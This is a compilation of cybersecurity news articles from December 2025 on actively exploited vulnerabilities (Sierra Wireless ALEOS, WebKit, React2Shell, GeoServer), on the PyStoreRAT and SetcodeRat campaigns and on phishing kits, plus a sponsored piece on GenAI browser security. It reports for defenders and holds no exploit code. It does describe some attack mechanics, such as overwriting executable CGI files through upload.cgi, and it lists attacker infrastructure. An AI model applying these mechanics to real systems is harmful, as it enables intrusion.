2025-12-15 AI创业新闻

CISA Adds Actively Exploited Sierra Wireless Router Flaw Enabling RCE Attacks

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday added a high-severity flaw impacting Sierra Wireless AirLink ALEOS routers to its Known Exploited Vulnerabilities ( KEV ) catalog, following reports of active exploitation in the wild. CVE-2018-4063 (CVSS score: 8.8/9.9) refers to an unrestricted file upload vulnerability that could be exploited to achieve remote code execution by means of a malicious HTTP request. “A specially crafted HTTP request can upload a file, resulting in executable code being uploaded, and routable, to the webserver,” the agency said.

“An attacker can make an authenticated HTTP request to trigger this vulnerability.” Details of the six-year-old flaw were publicly shared by Cisco Talos in April 2019, describing it as an exploitable remote code execution vulnerability in the ACEManager “upload.cgi” function of Sierra Wireless AirLink ES450 firmware version 4.9.3. Talos reported the flaw to the Canadian company in December 2018. “This vulnerability exists in the file upload capability of templates within the AirLink 450,” the company said. “When uploading template files, you can specify the name of the file that you are uploading.” “There are no restrictions in place that protect the files that are currently on the device, used for normal operation.

If a file is uploaded with the same name of the file that already exists in the directory, then we inherit the permissions of that file.” Talos noted that some of the files that exist in the directory (e.g., “fw_upload_init.cgi” or “fw_status.cgi”) have executable permissions on the device, meaning an attacker can send HTTP requests to the “/cgi-bin/upload.cgi” endpoint to upload a file with the same name to achieve code execution. This is compounded by the fact that ACEManager runs as root, thereby causing any shell script or executable uploaded to the device to also run with elevated privileges. The addition of CVE-2018-4063 to the KEV catalog comes a day after a honeypot analysis conducted by Forescout over a 90-day period revealed that industrial routers are the most attacked devices in operational technology (OT) environments, with threat actors attempting to deliver botnet and cryptocurrency miner malware families like RondoDox , Redtail , and ShadowV2 by exploiting the following flaws - CVE-2024-12856 (Four-Faith routers) CVE-2024-0012, CVE-2024-9474 , and CVE-2025-0108 (Palo Alto Networks PAN-OS) Attacks have also been recorded from a previously undocumented threat cluster named Chaya_005 that weaponized CVE-2018-4063 in early January 2024 to upload an unspecified malicious payload with the name “fw_upload_init.cgi.” No further successful exploitation efforts have been detected since then. “Chaya_005 appears to be a broader reconnaissance campaign testing multiple vendor vulnerabilities rather than focusing on a single one,” Forescout Research – Vedere Labs said , adding it’s likely the cluster is no longer a “significant threat.” In light of active exploitation of CVE-2018-4063, Federal Civilian Executive Branch (FCEB) agencies are advised to update their devices to a supported version or discontinue the use of the product by January 2, 2026, since it has reached end-of-support status.

Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Apple Issues Security Updates After Two WebKit Flaws Found Exploited in the Wild

Apple on Friday released security updates for iOS, iPadOS, macOS, tvOS, watchOS, visionOS, and its Safari web browser to address two security flaws that it said have been exploited in the wild, one of which is the same flaw that was patched by Google in Chrome earlier this week. The vulnerabilities are listed below - CVE-2025-43529 (CVSS score: N/A) - A use-after-free vulnerability in WebKit that may lead to arbitrary code execution when processing maliciously crafted web content CVE-2025-14174 (CVSS score: 8.8) - A memory corruption issue in WebKit that may lead to memory corruption when processing maliciously crafted web content Apple said it’s aware that the shortcomings “may have been exploited in an extremely sophisticated attack against specific targeted individuals on versions of iOS before iOS 26.” It’s worth noting that CVE-2025-14174 is the same vulnerability that Google issued patches for in its Chrome browser on December 10, 2025. It’s been described by the tech giant as an out-of-bounds memory access in the company’s open-source Almost Native Graphics Layer Engine (ANGLE) library, specifically in its Metal renderer . Apple Security Engineering and Architecture (SEAR) and Google Threat Analysis Group (TAG) have been credited with discovering and reporting the flaw, while Apple credited TAG with finding CVE-2025-43529.

This indicates that the vulnerabilities were likely weaponized in highly-targeted mercenary spyware attacks , given that they both affect WebKit, the rendering engine that’s also used in all third-party web browsers on iOS and iPadOS, including Chrome, Microsoft Edge, Mozilla Firefox, and others. The flaws have been addressed in the following versions and devices - iOS 26.2 and iPadOS 26.2

• iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later iOS 18.7.3 and iPadOS 18.7.3
• iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 7th generation and later, and iPad mini 5th generation and later macOS Tahoe 26.2
• Macs running macOS Tahoe tvOS 26.2
• Apple TV HD and Apple TV 4K (all models) watchOS 26.2
• Apple Watch Series 6 and later visionOS 26.2
• Apple Vision Pro (all models) Safari 26.2
• Macs running macOS Sonoma and macOS Sequoia With these updates, Apple has now patched nine zero-day vulnerabilities that were exploited in the wild in 2025, including CVE-2025-24085 , CVE-2025-24200 , CVE-2025-24201 , CVE-2025-31200, CVE-2025-31201 , CVE-2025-43200 , and CVE-2025-43300 . Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Fake OSINT and GPT Utility GitHub Repos Spread PyStoreRAT Malware Payloads

Cybersecurity researchers are calling attention to a new campaign that’s leveraging GitHub-hosted Python repositories to distribute a previously undocumented JavaScript-based Remote Access Trojan (RAT) dubbed PyStoreRAT . “These repositories, often themed as development utilities or OSINT tools, contain only a few lines of code responsible for silently downloading a remote HTA file and executing it via ‘mshta.exe,’” Morphisec researcher Yonatan Edri said in a report shared with The Hacker News. PyStoreRAT has been described as a “modular, multi-stage” implant that can execute EXE, DLL, PowerShell, MSI, Python, JavaScript, and HTA modules. The malware also deploys an information stealer known as Rhadamanthys as a follow-on payload.

Attack chains involve distributing the malware through Python or JavaScript loader stubs embedded in GitHub repositories masquerading as OSINT tools, DeFi bots, GPT wrappers, and security-themed utilities that are designed to appeal to analysts and developers. The earliest signs of the campaign go back to mid-June 2025, with a steady stream of “repositories” published since then. The tools are promoted via social media platforms like YouTube and X, as well as artificially inflate the repositories’ star and fork metrics – a technique reminiscent of the Stargazers Ghost Network . The threat actors behind the campaign leverage either newly created GitHub accounts or those that lay dormant for months to publish the repositories, stealthily slipping the malicious payload in the form of “maintenance” commits in October and November after the tools began to gain popularity and landed on GitHub’s top trending lists.

In fact, many of the tools did not function as they were advertised, only displaying static menus or non-interactive interfaces in some cases, while others performed minimal placeholder operations. The intention behind the operation was to lend them a veneer of legitimacy by abusing GitHub’s inherent trust and deceiving users into executing the loader stub that’s responsible for initiating the infection chain. This effectively triggers the execution of a remote HTML Application (HTA) payload that, in turn, delivers the PyStoreRAT malware, which comes with capabilities to profile the system, check for administrator privileges, and scan the system for cryptocurrency wallet-related files, specifically those associated with Ledger Live, Trezor, Exodus, Atomic, Guarda, and BitBox02. The loader stub gathers a list of installed antivirus products and check strings matching “Falcon” (a reference to CrowdStrike Falcon) or “Reason” (a reference to Cybereason or ReasonLabs) likely in an attempt to reduce visibility.

In the event they are detected, it launches “mshta.exe” by means of “cmd.exe.” Otherwise, it proceeds with direct “mshta.exe” execution. Persistence is achieved by setting up a scheduled task that’s disguised as an NVIDIA app self-update. In the final stage, the malware contacts an external server to fetch commands to be executed on the host. Some of the supported commands are listed below - Download and execute EXE payloads, including Rhadamanthys Download and extract ZIP archives Downloads a malicious DLL and executes it using “rundll32.exe” Fetch raw JavaScript code and execute it dynamically in memory using eval() Download and install MSI packages Spawn a secondary “mshta.exe” process to load additional remote HTA payloads Execute PowerShell commands directly in memory Spread via removable drives by replacing legitimate documents with malicious Windows Shortcut (LNK) files Delete the scheduled task to remove the forensic trail It’s currently not known who is behind the operation, but the presence of Russian-language artifacts and coding patterns alludes to a threat actor of likely Eastern European origin, Morphisec said.

“PyStoreRAT represents a shift toward modular, script-based implants that can adapt to security controls and deliver multiple payload formats,” Edri concluded. “Its use of HTA/JS for execution, Python loaders for delivery, and Falcon-aware evasion logic creates a stealthy first-stage foothold that traditional EDR solutions detect only late in the infection chain.” The disclosure comes as Chinese security vendor QiAnXin detailed another new remote access trojan (RAT) codenamed SetcodeRat that’s likely being propagated across the country since October 2025 via malvertising lures. Hundreds of computers, including those belonging to governments and enterprises, are said to have been infected in a span of one month. “The malicious installation package will first verify the region of the victim,” the QiAnXin Threat Intelligence Center said .

“If it is not in the Chinese-speaking area, it will automatically exit.” The malware is disguised as legitimate installers for popular programs like Google Chrome and proceeds to the next stage only if the system language corresponds to Mainland China (Zh-CN), Hong Kong (Zh-HK), Macao (Zh-MO), and Taiwan (Zh-TW). It also terminates the execution if a connection to a Bilibili URL (“api.bilibili[.]com/x/report/click/now”) is unsuccessful. In the next stage, an executable named “pnm2png.exe” is launched to sideload “zlib1.dll,” which then decrypts the contents of a file called “qt.conf” and runs it. The decrypted payload is a DLL that embeds the RAT payload.

SetcodeRat can either connect to Telegram or a conventional command-and-control (C2) server to retrieve instructions and carry out data theft. It enables the malware to take screenshots, log keystrokes, read folders, set folders, start processes, run “cmd.exe,” set socket connections, collect system and network connection information, update itself to a new version. Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

New Advanced Phishing Kits Use AI and MFA Bypass Tactics to Steal Credentials at Scale

Cybersecurity researchers have documented four new phishing kits named BlackForce, GhostFrame, InboxPrime AI, and Spiderman that are capable of facilitating credential theft at scale. BlackForce, first detected in August 2025, is designed to steal credentials and perform Man-in-the-Browser ( MitB ) attacks to capture one-time passwords (OTPs) and bypass multi-factor authentication (MFA). The kit is sold on Telegram forums for anywhere between €200 ($234) and €300 ($351). The kit, according to Zscaler ThreatLabz researchers Gladis Brinda R and Ashwathi Sasi, has been used to impersonate over 11 brands, including Disney, Netflix, DHL, and UPS.

It’s said to be in active development. “BlackForce features several evasion techniques with a blocklist that filters out security vendors, web crawlers, and scanners,” the company said. “BlackForce remains under active development. Version 3 was widely used until early August, with versions 4 and 5 being released in subsequent months.” Phishing pages connected to the kit have been found to use JavaScript files with what has been described as “ cache busting “ hashes in their names (e.g., “index-[hash].js”), thereby forcing the victim’s web browser to download the latest version of the malicious script instead of using a cached version.

In a typical attack using the kit, victims who click on a link are redirected to a malicious phishing page, after which a server-side check filters out crawlers and bots, before serving them a page that’s designed to mimic a legitimate website. Once the credentials are entered on the page, the details are captured and sent to a Telegram bot and a command-and-control (C2) panel in real-time using an HTTP client called Axios . When the attacker attempts to log in with the stolen credentials on the legitimate website, an MFA prompt is triggered. At this stage, the MitB techniques are used to display a fake MFA authentication page to the victim’s browser through the C2 panel.

Should the victim enter the MFA code on the bogus page, it’s collected and used by the threat actor to gain unauthorized access to their account. “Once the attack is complete, the victim is redirected to the homepage of the legitimate website, hiding evidence of the compromise and ensuring the victim remains unaware of the attack,” Zscaler said. GhostFrame Fuels 1M+ Stealth Phishing Attacks Another nascent phishing kit that has gained traction since its discovery in September 2025 is GhostFrame. At the heart of the kit’s architecture is a simple HTML file that appears harmless while hiding its malicious behavior within an embedded iframe, which leads victims to a phishing login page to steal Microsoft 365 or Google account credentials.

“The iframe design also allows attackers to easily switch out the phishing content, try new tricks or target specific regions, all without changing the main web page that distributes the kit,” Barracuda security researcher Sreyas Shetty said . “Further, by simply updating where the iframe points, the kit can avoid being detected by security tools that only check the outer page.” Attacks using the GhostFrame kit commence with typical phishing emails that claim to be about business contracts, invoices, and password reset requests, but are designed to take recipients to the fake page. The kit uses anti-analysis and anti-debugging to prevent attempts to inspect it using browser developer tools, and generates a random subdomain each time someone visits the site. The visible outer pages come with a loader script that’s responsible for setting up the iframe and responding to any messages from the HTML element.

This can include changing the parent page’s title to impersonate trusted services, modifying the site favicon, or redirecting the top-level browser window to another domain. In the final stage, the victim is sent to a secondary page containing the actual phishing components through the iframe delivered via the constantly changing subdomain, thereby making it harder to block the threat. The kit also incorporates a fallback mechanism in the form of a backup iframe appended at the bottom of the page in the event the loader JavaScript fails or is blocked. InboxPrime AI Phishing Kit Automates Email Attacks If BlackForce follows the same playbook as other traditional phishing kits, InboxPrime AI goes a step further by leveraging artificial intelligence (AI) to automate mass mailing campaigns.

It’s advertised on a 1,300-member-strong Telegram channel under a malware-as-a-service (MaaS) subscription model for $1,000, granting purchasers a perpetual license and full access to the source code. “It is designed to mimic real human emailing behavior and even leverages Gmail’s web interface to evade traditional filtering mechanisms,” Abnormal researchers Callie Baron and Piotr Wojtyla said . “InboxPrime AI blends artificial intelligence with operational evasion techniques and promises cybercriminals near-perfect deliverability, automated campaign generation, and a polished, professional interface that mirrors legitimate email marketing software.” The platform employs a user-friendly interface that allows customers to manage accounts, proxies, templates, and campaigns, mirroring commercial email automation tools. One of its core features is a built-in AI-powered email generator, which can produce entire phishing emails, including the subject lines, in a manner that mimics legitimate business communication.

In doing so, these services further lower the barrier to entry for cybercrime, effectively eliminating the manual work that goes into drafting such emails. In its place, attackers can configure parameters, such as language, topic, or industry, email length, and desired tone, which the toolkit uses as inputs to generate convincing lures that match the chosen theme. What’s more, the dashboard enables users to save the produced email as a reusable template, complete with support for spintax to create variations of the email messages by substituting certain template variables. This ensures that no two phishing emails look identical and helps them bypass signature-based filters that look for similar content patterns.

Some of the other supported features in InboxPrime AI are listed below - A real-time spam diagnostic module that can analyze a generated email for common spam-filter triggers and suggest precise corrections Sender identity randomization and spoofing, enabling attackers to customize display names for each Gmail session “This industrialization of phishing has direct implications for defenders: more attackers can now launch more campaigns with more volume, without any corresponding increase in defender bandwidth or resources,” Abnormal said. “This not only accelerates campaign launch time but also ensures consistent message quality, enables scalable, thematic targeting across industries, and empowers attackers to run professional-looking phishing operations without copywriting expertise.” Spiderman Creates Pixel-Perfect Replicas of European Banks The third phishing kit that has come under the cybersecurity radar is Spiderman, which permits attackers to target customers of dozens of European banks and online financial services providers, such as Blau, CaixaBank, Comdirect, Commerzbank, Deutsche Bank, ING, O2, Volksbank, Klarna, and PayPal. “Spiderman is a full-stack phishing framework that replicates dozens of European banking login pages, and even some government portals,” Varonis researcher Daniel Kelley said . “Its organized interface provides cybercriminals with an all-in-one platform to launch phishing campaigns, capture credentials, and manage stolen session data in real-time.” What’s notable about the modular kit is that its seller is marketing the solution in a Signal messenger group that has about 750 members, marking a departure from Telegram.

Germany, Austria, Switzerland, and Belgium are the primary targets of the phishing service. Like in the case of BlackForce, Spiderman utilizes various techniques like ISP allowlisting, geofencing, and device filtering to ascertain that only the intended targets can access the phishing pages. The toolkit is also equipped to capture cryptocurrency wallet seed phrases, intercept OTP and PhotoTAN codes, and trigger prompts to gather credit card data. “This flexible, multi-step approach is particularly effective in European banking fraud, where login credentials alone often aren’t enough to authorize transactions,” Kelley explained.

“After capturing credentials, Spiderman logs each session with a unique identifier so the attacker can maintain continuity through the entire phishing workflow.” Hybrid Salty-Tycoon 2FA Attacks Spotted BlackForce, GhostFrame, InboxPrime AI, and Spiderman are the latest additions to a long list of phishing kits like Tycoon 2FA , Salty 2FA , Sneaky 2FA , Whisper 2FA , Cephas , and Astaroth (not to be confused with a Windows banking trojan of the same name) that have emerged over the past year. In a report published earlier this month, ANY.RUN said it observed a new Salty-Tycoon hybrid that’s already bypassing detection rules tuned to either of them. The new attack wave coincides with a sharp drop in Salty 2FA activity in late October 2025, with early stages matching Salty2FA, while later stages load code that reproduces Tycoon 2FA’s execution chain. “This overlap marks a meaningful shift; one that weakens kit-specific rules, complicates attribution, and gives threat actors more room to slip past early detection,” the company said .

“Taken together, this provides clear evidence that a single phishing campaign, and, more interestingly, a single sample, contains traces of both Salty 2FA and Tycoon, with Tycoon serving as a fallback payload once the Salty infrastructure stopped working for reasons that are still unclear.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Securing GenAI in the Browser: Policy, Isolation, and Data Controls That Actually Work

The browser has become the main interface to GenAI for most enterprises: from web-based LLMs and copilots, to GenAI‑powered extensions and agentic browsers like ChatGPT Atlas . Employees are leveraging the power of GenAI to draft emails, summarize documents, work on code, and analyze data, often by copying/pasting sensitive information directly into prompts or uploading files. Traditional security controls were not designed to understand this new prompt‑driven interaction pattern, leaving a critical blind spot where risk is highest. Security teams are simultaneously under pressure to enable more GenAI platforms because they clearly boost productivity.

Simply blocking AI is unrealistic. The more sustainable approach is to secure GenAI platforms where they are accessed by users: inside the browser session. The GenAI browser threat model The GenAI‑in‑the‑browser threat model must be approached differently from traditional web browsing due to several key factors. Users routinely paste entire documents, code, customer records, or sensitive financial information into prompt windows.

This can lead to data exposure or long‑term retention in the LLM system. File uploads create similar risks when documents are processed outside of approved data‑handling pipelines or regional boundaries, putting organizations in jeopardy of violating regulations. GenAI browser extensions and assistants often require broad permissions to read and modify page content. This includes data from internal web apps that users never intended to share with external services.

Mixed use of personal and corporate accounts in the same browser profile complicates attribution and governance. All of these behaviors put together create a risk surface that is invisible to many legacy controls. Policy: defining safe use in the browser A workable GenAI security strategy in the browser is a clear, enforceable policy that defines what “safe use” means. CISOs should categorize GenAI tools into sanctioned services and allow/disallow public tools and applications with different risk treatments and monitoring levels.

After setting clear boundaries, enterprises can then align browser‑level enforcement so that the user experience matches the policy intent. A strong policy consists of specifications around which data types are never allowed in GenAI prompts or uploads. Common restricted categories can include regulated personal data, financial details, legal information, trade secrets, and source code. The policy language should also be concrete and consistently enforced by technical controls rather than relying on user judgment.

Behavioral guardrails that users can live with Beyond allowing or disallowing applications, enterprises need guardrails that define how employees should access and use GenAI in the browser. Requiring single sign‑on and corporate identities for all sanctioned GenAI services can improve visibility and control while reducing the likelihood that data ends up in unmanaged accounts. Exception handling is equally important, as teams such as research or marketing may require more permissive GenAI access. Others, like finance or legal, may need stricter guardrails.

A formal process for requesting policy exceptions, time‑based approvals, and review cycles allows flexibility. These behavioral elements make technical controls more predictable and acceptable to end users. Isolation: containing risk without harming productivity Isolation is the second major pillar of securing browser-based GenAI use. Instead of a binary model, organizations can use specific approaches to reduce risk when GenAI is being accessed.

Dedicated browser profiles, for example, create boundaries between sensitive internal apps and GenAI‑heavy workflows. Per‑site and per‑session controls provide another layer of defense. For example, a security team may allow GenAI access to designated “safe” domains while restricting the ability of AI tools and extensions to read content from high‑sensitivity applications like ERP or HR systems. This approach enables employees to continue using GenAI for generic tasks while reducing the likelihood that confidential data is being shared with third‑party tools accessed inside the browser.

Data controls: precision DLP for prompts and pages Policy defines the intent, and isolation limits exposure. Data controls provide the precise enforcement mechanism at the browser edge. Inspecting user actions like copy/paste, drag‑and‑drop, and file uploads at the point where they leave trusted apps and enter GenAI interfaces is critical. Effective implementations should support multiple enforcement modes: monitor‑only, user warnings, in‑time education, and hard blocks for clearly prohibited data types.

This tiered approach helps reduce user friction while preventing serious leaks. Managing GenAI browser extensions GenAI‑powered browser extensions and side panels are a tricky risk category. Many offers convenient features like page summarizations, creating replies, or data extraction. But doing so often requires extensive permissions to read and modify page content, keystrokes, and clipboard data.

Without oversight, these extensions can become an exfiltration channel for sensitive information. CISOs must be aware of the AI‑powered extensions in use at their enterprise, classify them by risk level, and enforce a default‑deny or allowed with restrictions list. Using a Secure Enterprise Browser (SEB) for continuous monitoring of newly installed or updated extensions helps identify changes in permissions that may introduce new risks over time. Identity, accounts, and session hygiene Identity and session handling are central to GenAI browser security because they determine which data belongs to which account.

Enforcing SSO for sanctioned GenAI platforms and tying usage back to enterprise identities will simplify logging and incident response. Browser‑level controls can help prevent cross‑access between work and personal contexts. For example, organizations can block copying content from corporate apps into GenAI applications when the user has not been authenticated into a corporate account. Visibility, telemetry, and analytics Ultimately, a working GenAI security program relies on accurate visibility into how employees are using browser-based GenAI tools.

Tacking which domains and apps are accessed, the contents being entered into prompts, and how often policies trigger warnings or blocks are all necessary. Aggregating this telemetry into existing logging and SIEM infrastructure allows security teams to identify patterns, outliers, and incidents. Analytics built on this data can help highlight genuine risk. For example, enterprises can make a clear determination between non‑sensitive vs proprietary source code being entered into prompts.

Using this information, SOC teams can refine rules, adjust isolation levels, and target training where it will provide the greatest impact. Change management and user education CISOs with successful GenAI security programs invest in the time to explain the “why” behind restrictions. By sharing concrete scenarios that resonate with different roles, you can reduce the chances of your program failing - developers need examples related to IP, while sales and support staff benefit from stories about customer trust and contract details. Sharing scenario‑based content with relevant parties will reinforce good habits in the right moments.

When employees understand that guardrails are designed to preserve their ability to use GenAI at scale, not hinder them, they are more likely to follow the guidelines. Aligning communications with broader AI governance initiatives helps position browser‑level controls as part of a cohesive strategy rather than an isolated one. A practical 30‑day rollout approach Many organizations are looking for a pragmatic path to move from ad‑hoc browser-based GenAI usage to a structured, policy‑driven model. One effective way of doing so is utilizing a Secure Enterprise Browsing (SEB) platform that can provide you with the visibility and reach needed.

With the right SEB you can map the current GenAI tools used within your enterprise, so you can create policy decisions like monitoring‑only or warn‑and‑educate modes for clearly risky behaviors. Over the following weeks, enforcement can be expanded to more users and higher‑risk data types, FAQs, and training. By the end of a 30‑day period, many organizations can formalize their GenAI browser policy, integrate alerts into SOC workflows, and establish a cadence for adjusting controls as usage evolves. Turning the browser into the GenAI control plane As GenAI continues to spread across SaaS apps and web pages, the browser remains the central interface through which most employees access them.

The best GenAI protections simply cannot be worked into legacy perimeter controls. Enterprises can achieve the best results by treating the browser as the primary control plane. This approach enables security teams with meaningful ways to reduce data leakage and compliance risk while simultaneously preserving the productivity benefits that make GenAI so powerful. With well‑designed policies, measured isolation strategies, and browser‑native data protections, CISOs can move from reactive blocking to confident, large‑scale enablement of GenAI across their entire workforce.

To learn more about Secure Enterprise Browsers (SEB) and how they can secure GenAI use at your organization, speak to a Seraphic expert . Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

New React RSC Vulnerabilities Enable DoS and Source Code Exposure

The React team has released fixes for two new types of flaws in React Server Components (RSC) that, if successfully exploited, could result in denial-of-service (DoS) or source code exposure. The team said the issues were found by the security community while attempting to exploit the patches released for CVE-2025-55182 (CVSS score: 10.0), a critical bug in RSC that has since been weaponized in the wild . The three vulnerabilities are listed below - CVE-2025-55184 (CVSS score: 7.5) - A pre-authentication denial of service vulnerability arising from unsafe deserialization of payloads from HTTP requests to Server Function endpoints, triggering an infinite loop that hangs the server process and may prevent future HTTP requests from being served CVE-2025-67779 (CVSS score: 7.5) - An incomplete fix for CVE-2025-55184 that has the same impact CVE-2025-55183 (CVSS score: 5.3) - An information leak vulnerability that may cause a specifically crafted HTTP request sent to a vulnerable Server Function to return the source code of any Server Function However, successful exploitation of CVE-2025-55183 requires the existence of a Server Function that explicitly or implicitly exposes an argument that has been converted into a string format. The flaws affecting the following versions of react-server-dom-parcel, react-server-dom-turbopack, and react-server-dom-webpack - CVE-2025-55184 and CVE-2025-55183

• 19.0.0, 19.0.1 19.1.0, 19.1.1, 19.1.2, 19.2.0 and 19.2.1 CVE-2025-67779
• 19.0.2, 19.1.3 and 19.2.2 Security researchers RyotaK and Shinsaku Nomura have been credited with reporting the two DoS bugs to the Meta Bug Bounty program, while Andrew MacPherson has been acknowledged for reporting the information leak flaw.

Users are advised to update to versions 19.0.3, 19.1.4, and 19.2.3 as soon as possible, particularly in light of active exploration of CVE-2025-55182. “When a critical vulnerability is disclosed, researchers scrutinize adjacent code paths looking for variant exploit techniques to test whether the initial mitigation can be bypassed,” the React team said. “This pattern shows up across the industry, not just in JavaScript. Additional disclosures can be frustrating, but they are generally a sign of a healthy response cycle.” Found this article interesting?

Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

React2Shell Exploitation Escalates into Large-Scale Global Attacks, Forcing Emergency Mitigation

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has urged federal agencies to patch the recent React2Shell vulnerability by December 12, 2025, amid reports of widespread exploitation. The critical vulnerability, tracked as CVE-2025-55182 (CVSS score: 10.0), affects the React Server Components (RSC) Flight protocol. The underlying cause of the issue is an unsafe deserialization that allows an attacker to inject malicious logic that the server executes in a privileged context.

It also affects other frameworks, including Next.js, Waku, Vite, React Router, and RedwoodSDK. “A single, specially crafted HTTP request is sufficient; there is no authentication requirement, user interaction, or elevated permissions involved,” Cloudforce One, Cloudflare’s threat intelligence team, said . “Once successful, the attacker can execute arbitrary, privileged JavaScript on the affected server.” Since its public disclosure on December 3, 2025, the shortcoming has been exploited by multiple threat actors in various campaigns to engage in reconnaissance efforts and deliver a wide range of malware families. The development prompted CISA to add it to its Known Exploited Vulnerabilities catalog last Friday, giving federal agencies until December 26 to apply the fixes.

The deadline has since been revised to December 12, 2025, an indication of the severity of the incident. Cloud security company Wiz said it has observed a “rapid wave of opportunistic exploitation” of the flaw, with a vast majority of the attacks targeting internet-facing Next.js applications and other containerized workloads running in Kubernetes and managed cloud services. Image Source: Cloudflare Cloudflare, which is also tracking ongoing exploitation activity, said threat actors have conducted searches using internet-wide scanning and asset discovery platforms to find exposed systems running React and Next.js applications. Notably, some of the reconnaissance efforts have excluded Chinese IP address spaces from their searches.

“Their highest-density probing occurred against networks in Taiwan, Xinjiang Uyghur, Vietnam, Japan, and New Zealand – regions frequently associated with geopolitical intelligence collection priorities,” the web infrastructure company said. The observed activity is also said to have targeted, albeit more selectively, government (.gov) websites, academic research institutions, and critical‑infrastructure operators. This included a national authority responsible for the import and export of uranium, rare metals, and nuclear fuel. Some of the other notable findings are listed below - Prioritizing high‑sensitivity technology targets such as enterprise password managers and secure‑vault services, likely with the goal of perpetrating supply chain attacks Targeting edge‑facing SSL VPN appliances whose administrative interfaces may incorporate React-based components Early scanning and exploitation attempts originated from IP addresses previously associated with Asia-affiliated threat clusters In its own analysis of honeypot data, Kaspersky said it recorded over 35,000 exploitation attempts on a single day on December 10, 2025, with the attackers first probing the system by running commands like whoami, before dropping cryptocurrency miners or botnet malware families like Mirai/Gafgyt variants and RondoDox.

Some of the other observed payloads include Cobalt Strike beacons, Sliver, Fast Reverse Proxy (FRP), a monitoring tool named Nezha , a Node.js payload that harvests sensitive files and weaponizes TruffleHog and Gitleaks to collect secrets, and a Go-based backdoor with reverse shell, reconnaissance, and command-and-control (C2) capabilities. In parallel, React2Shell is estimated to have produced over 140 in-the-wild proof-of-concept exploits of varying quality, with about half of them broken, misleading, or otherwise unusable, per VulnCheck . The remaining exploit repositories contain logic to load in-memory web shells like Godzilla , scan for the flaw , and even deploy a lightweight web application firewall (WAF) to block malicious payloads. Security researcher Rakesh Krishnan has also discovered an open directory hosted on “154.61.77[.]105:8082” that includes a proof-of-concept (PoC) exploit script for CVE-2025–55182 along with two other files - “domains.txt,” which contains a list of 35,423 domains “next_target.txt,” which contains a list of 596 URLs, including companies like Dia Browser, Starbucks, Porsche, and Lululemon It has been assessed that the unidentified threat actor is actively scanning the internet based on targets added to the second file, infecting hundreds of pages in the process.

Cybersecurity and cyber insurance company Coalition has likened React2Shell to the 2021 Log4Shell vulnerability ( CVE-2021-44228 ), describing it as a “systemic cyber risk aggregation event.” According to the latest data from The Shadowserver Foundation, there are more than 137,200 internet-exposed IP addresses running vulnerable code as of December 11, 2025. Of these, over 88,900 instances are located in the U.S., followed by Germany (10,900), France (5,500), and India (3,600). Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

CISA Flags Actively Exploited GeoServer XXE Flaw in Updated KEV Catalog

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday added a high-severity security flaw impacting OSGeo GeoServer to its Known Exploited Vulnerabilities ( KEV ) catalog, based on evidence of active exploitation in the wild. The vulnerability in question is CVE-2025-58360 (CVSS score: 8.2), an unauthenticated XML External Entity ( XXE ) flaw that affects all versions prior to and including 2.25.5, and from versions 2.26.0 through 2.26.1. It has been patched in versions 2.25.6 , 2.26.2 , 2.27.0 , 2.28.0 , and 2.28.1 .

Artificial intelligence (AI)-powered vulnerability discovery platform XBOW has been acknowledged for reporting the issue. “OSGeo GeoServer contains an improper restriction of XML external entity reference vulnerability that occurs when the application accepts XML input through a specific endpoint /geoserver/wms operation GetMap and could allow an attacker to define external entities within the XML request,” CISA said. The following packages are affected by the flaw - docker.osgeo.org/geoserver org.geoserver.web:gs-web-app (Maven) org.geoserver:gs-wms (Maven) Successful exploitation of the vulnerability could allow an attacker to access arbitrary files from the server’s file system, conduct Server-Side Request Forgery (SSRF) to interact with internal systems, or launch a denial-of-service (DoS) attack by exhausting resources, the maintainers of the open-source software said in an alert published late last month. There are currently no details available on how the security defect is being abused in real-world attacks.

However, a bulletin from the Canadian Centre for Cyber Security on November 28, 2025, said “an exploit for CVE-2025-58360 exists in the wild.” It’s worth noting that another critical flaw in the same software (CVE-2024-36401, CVSS score: 9.8) has been exploited by multiple threat actors over the past year . Federal Civilian Executive Branch (FCEB) agencies are advised to apply the required fixes by January 1, 2026, to secure their networks. Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

ThreatsDay Bulletin: Spyware Alerts, Mirai Strikes, Docker Leaks, ValleyRAT Rootkit — and 20 More Stories

This week’s cyber stories show how fast the online world can turn risky. Hackers are sneaking malware into movie downloads, browser add-ons, and even software updates people trust. Tech giants and governments are racing to plug new holes while arguing over privacy and control. And researchers keep uncovering just how much of our digital life is still wide open.

The new Threatsday Bulletin brings it all together—big hacks, quiet exploits, bold arrests, and smart discoveries that explain where cyber threats are headed next. It’s your quick, plain-spoken look at the week’s biggest security moves before they become tomorrow’s headlines. Maritime IoT under siege Mirai-Based Broadside Botnet Exploits TBK DVR Flaw A new Mirai botnet variant dubbed Broadside has been exploiting a critical-severity vulnerability in TBK DVR ( CVE-2024-3721 ) in attacks targeting the maritime logistics sector. “Unlike previous Mirai variants, Broadside employs a custom C2 protocol, a unique ‘Magic Header; signature, and an advanced ‘Judge, Jury, and Executioner’ module for exclusivity,” Cydome said .

